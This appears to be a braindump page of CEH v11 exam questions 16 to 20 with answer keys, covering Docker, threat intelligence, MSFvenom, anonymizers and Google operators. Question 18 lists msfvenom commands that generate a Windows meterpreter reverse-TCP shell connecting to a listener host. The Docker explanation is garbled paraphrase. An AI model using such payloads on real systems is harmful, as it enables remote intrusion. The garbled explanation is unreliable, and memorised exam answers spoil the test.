Free 312-50v11 Exam Braindumps

Pass your Certified Ethical Hacker Exam (CEH v11) exam with these free Questions and Answers

Page 5 of 106
QUESTION 16

Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes. Images, and networks. What is the component of the Docker architecture used by Annie in the above scenario?

  1. A. Docker client
  2. B. Docker objects
  3. C. Docker daemon
  4. D. Docker registries

Correct Answer: C
Docker uses a client-server design. The docker client talks to the docker daemon, that will the work of building, running, and distributing your docker containers. The docker client and daemon will run on the same system, otherwise you will connect a docker consumer to a remote docker daemon. The docker consumer and daemon communicate using a REST API, over OS sockets or a network interface.
312-50v11 dumps exhibit
The docker daemon (dockerd) listens for docker API requests and manages docker objects like pictures, containers, networks, and volumes. A daemon may communicate with other daemons to manage docker services.

QUESTION 17

Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the organization's network.
Which type of threat intelligence is used by Roma to secure the internal network?

  1. A. Technical threat intelligence
  2. B. Operational threat intelligence
  3. C. Tactical threat intelligence
  4. D. Strategic threat intelligence

Correct Answer: A

QUESTION 18

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

  1. A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  2. B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  3. C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  4. D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Correct Answer: C

QUESTION 19

George, an employee of an organization, is attempting to access restricted websites from an official computer. For this purpose, he used an anonymizer that masked his real IP address and ensured complete and continuous anonymity for all his online activities. Which of the following anonymizers helps George hide his activities?

  1. A. https://www.baidu.com
  2. B. https://www.guardster.com
  3. C. https://www.wolframalpha.com
  4. D. https://karmadecay.com

Correct Answer: B

QUESTION 20

Which of the following Google advanced search operators helps an attacker in gathering information about websites that are similar to a specified target URL?

  1. A. [inurl:]
  2. B. [related:]
  3. C. [info:]
  4. D. [site:]

Correct Answer: B
related:This operator displays websites that are similar or related to the URL specified.

Page 5 of 106

Post your Comments and Discuss EC-Council 312-50v11 exam with other Community members: